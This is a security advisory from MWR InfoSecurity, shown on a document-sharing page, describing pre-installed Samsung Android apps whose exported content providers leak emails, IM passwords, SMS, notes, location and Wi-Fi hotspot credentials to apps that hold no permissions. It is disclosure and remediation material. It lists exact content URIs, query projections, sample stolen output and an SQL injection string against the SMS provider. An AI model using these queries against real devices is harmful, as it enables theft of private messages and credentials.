Multiple Samsung (Android) Application Vulnerabilities

Size: px

Start display at page:

Download "Multiple Samsung (Android) Application Vulnerabilities"

Pamela Tyler
6 years ago
Views:

1 Multiple Samsung (Android) Application Vulnerabilities MWR InfoSecurity Advisory 13/12/2011 Name Multiple pre-installed Samsung applications Date 13 th December 2011 Affected Versions Samsung Galaxy S2 (I9100XWKI4) Android Other models running these applications may be affected CVE Reference Authors Severity Local/Remote Vulnerability Class Vendor Vendor Response None Tyrone Erasmus Mike Auty (Channels SQLi) High Risk Local Android Content Providers Samsung Vendor updated all vulnerable software and firmware releases after 13 th March 2012 contain the fixes. Description Many Samsung applications are pre-installed by default on Samsung Android devices and these applications cannot be removed by the user. Some of these applications make use of content providers which are implicitly exported by default. This results in these content providers allowing other applications on the device to request sensitive information and successfully obtain it. This is cause for concern as any 3 rd party application containing malicious code does not require any granted permissions in order to obtain sensitive information from these applications. It should be noted that only applications disclosing potentially sensitive information are being reported on in this document. The following applications allow the retrieval of sensitive information from their content providers without any granted permissions: Obtainable Version address password contents Instant messages com.sec.android.socialhub Social networking messages MWR InfoSecurity 1 of 10

com.sec.android.im (IM) Instant messages IM contacts 1.00.10201 com.android.providers.telephony (Dialer Storage) SMS 2.3.4 com.sec.android.provider.logsprovider (LogsProvider) SMS Email contents Instant messages Social networking messages Call logs 1.

2 com.sec.android.im (IM) Instant messages IM contacts com.android.providers.telephony (Dialer Storage) SMS com.sec.android.provider.logsprovider (LogsProvider) SMS contents Instant messages Social networking messages Call logs 1.0 com.sec.android.widgetapp.weatherclock (AccuWeather.com) Location com.sec.android.app.minidiary (MiniDiary) Notes Photo GPS coordinates 1.0 com.sec.android.app.memo (Memo) Notes 1.0 com.sec.android.widgetapp.postit (Minipaper) Notes 1.0 com.osp.app.signin (Samsung account) Encrypted account information 1.0 com.android.providers.settings (Settings Storage) Portable Wi-Fi hotspot credentials Impact Malicious applications installed on the same device as the vulnerable applications could steal sensitive information from the user and transmit it back to the attacker. Cause These vulnerabilities are present because insufficient security permissions are set on the content provider section in each of the vulnerable application s AndroidManifest.xml file. MWR InfoSecurity 2 of 10

3 Interim Workaround Avoid using the vulnerable applications if you do not have access to the firmware update. To clear information stored in these applications go to Settings->Applications->Manage Applications and press Clear data. Solution In the AndroidManifest.xml file of each application that contains a content provider, it was recommended that read and write permissions are set. An example is shown below: <provider android:name=".db.provider android:authorities="com.example.app" android:readpermission="com.example.app.provider.permission.read" android:writepermission="com.example.app.provider.permission.write" /> This means that an application wanting to read or write to this content provider needs to have the stated permissions in order to do so. MWR InfoSecurity 3 of 10

4 Technical Description The following section will be organised by the information that is obtainable by an unprivileged application. The premise of this section is that an application with no granted permissions can perform a query on the specified content providers in order to obtain the targeted information. When querying a content provider, methods are provided that allows the developer to construct SQL statements. The following is what the query method in Android looks like to a developer: query(uri, projection, selection, selectionargs, sortorder) These parameters get used at various points in a SQL statement to construct the query. This also means that there is often SQL injection vulnerabilities present in these fields on content providers. Registered user accounts within Social Hub and their associated service. Uri: content://com.seven.provider. /accounts Projection: user_name, provision_name user_name provision_name testaccount@yahoo.com Yahoo! Messenger testaccount@yahoo.com Yahoo! Mail The password for instant messaging accounts within Social Hub. This password is often the same for the account and IM account on services like Yahoo and Google. Uri: content://com.seven.provider. /dbprefs _id category type key value flags 242 Account-6 5 Z7_IM_CLIENT_SETTING_PASSWORD_STRING Password123 0 MWR InfoSecurity 4 of 10

5 messages. Uri: content://com.seven.provider. / s Projection: _id, _from, subject, body _id _from subject body 30 Test subject contents com.sec.android.provider.logsprovider (LogsProvider) messages. Uri: content://logs/ _seven Projection: messageid, address, m_subject, m_content messageid address m_subject m_content 30 Test subject contents All accounts registered in Social Hub have their contents logged. This query to the logs content provider shows the same data as com.seven.provider. provider except that even if the account gets deregistered or removed from Social Hub, the logs still persist. Instant Messages Get all contacts. Uri: content://com.seven.provider.im/contacts Projection: contact John Paul Susan MWR InfoSecurity 5 of 10

6 Get instant messages from Social Hub. Uri: content://com.seven.provider.im/messages Projection: _id, contact, account, body _id contact account body 14 John 6 Hi, how are you? com.sec.android.provider.logsprovider (LogsProvider) Get the same instant message as above, except from the logs. Uri: content://logs/im Projection: account_id, name, m_content account_id buddy_name message 6 John Hi, how are you? The logs persist even after an IM account has been deregistered. com.sec.android.im (IM) Get the same instant message as above, except from the IM application itself. Uri: content://com.tecace.app.convprovider Projection: _id, accountid, buddy_name, message _id accountid buddy_name message 3-1 null Hi, how are you? MWR InfoSecurity 6 of 10

7 SMS com.android.providers.telephony (Dialer Storage) All SMS messages. Uri: content://channels Projection: * FROM sms;-- _id thread_id address person date protocol read status type reply_path_present subject body service_center locked error_code seen deletable hidden group_id group_type delivery_date null null null null This is a message from me to you null null null SQL injection exists within the projection and selection parameters for the channels content provider. com.sec.android.provider.logsprovider (LogsProvider) First 50 characters of SMS messages. Uri: content://logs/historys Projection: number, m_content Selection: number like '+%' number m_content This is a message from me to you MWR InfoSecurity 7 of 10

8 Social Networking Messages com.sec.android.socialhub Messages from Social Networks. Uri: content://com.sec.android.socialhub.unifiedinbox/messages Projection: name,m_subject,m_content name m_subject m_content John Smith Birthday Are you coming to my party? Notes com.sec.android.app.minidiary (MiniDiary) All notes entries, photos and photo locations. Uri: content://com.sec.android.providers.minidiary.minidiarydata/diary Projection: _id, location, date, longitude, latitude, picture_file, note _id location date longitude latitude picture_file note 1 Germany, Hesse /data/data/com.sec.android.app.minidiary/files/picture/ jpg Beautiful! It should also be noted that on Android the contents of the SD card are accessible from any application, allowing applications to retrieve them and upload them to an attacker. com.sec.android.app.memo (Memo) User notes stored in this application. Uri: content://com.samsung.sec.android/memo/all Projection: _id, title, content _id title content Note contents MWR InfoSecurity 8 of 10

9 com.sec.android.widgetapp.postit (Minipaper) User notes stored in this application. Uri: content://com.sec.android.widgetapp.postit/postit Projection: _id, body _id body 1 My first postit! Miscellaneous com.sec.android.socialhub Name of the owner of the device. Uri: content://com.sec.android.socialhub.unifiedinbox/sns_msg_receiver_map Projection: receiver_name Tyrone Erasmus com.sec.android.widgetapp.weatherclock (AccuWeather.com) General location of the owner of the device. Uri: content://com.sec.android.widgetapp.weatherclock NAME STATE LOCATION MAIN_DISPLAY SUMMER_TIME LATITUDE LONGITUDE PROVIDER Pretoria Gauteng, South Africa cityid: MWR InfoSecurity 9 of 10

10 com.osp.app.signin (Samsung account) Obtain encrypted Samsung account settings. Uri: content://com.osp.contentprovider.ospcontentprovider/identity Value Key <base64_value> UserID <base64_value> ID <base64_value> Password <base64_value> MobileCountryCode <base64_value> AuthToken <base64_value> AuthTokenSecret <base64_value> BirthDate <base64_value> UserDeviceID It should be noted that the <base64_value> given above is an encrypted string that has been base64 encoded. If the mechanism that encrypts and decrypts this data is found to be weak, the user s Samsung account would be compromised. com.android.providers.settings (Settings Storage) Portable Wi-Fi hotspot credentials. Uri: content://settings/secure _id name value 2736 wifi_ap_passwd h0tsp0tp@ssw0rd 2859 wifi_ap_ssid Hotspot1234 MWR InfoSecurity 10 of 10

MWR InfoSecurity Security Advisory. Oracle Enterprise Manager SQL Injection Advisory. 1 st February 2010

MWR InfoSecurity Security Advisory Oracle Enterprise Manager SQL Injection Advisory 1 st February 2010 2010-11-12 Page 1 of 8 CONTENTS CONTENTS 1 Detailed Vulnerability Description... 4 1.1 Introduction...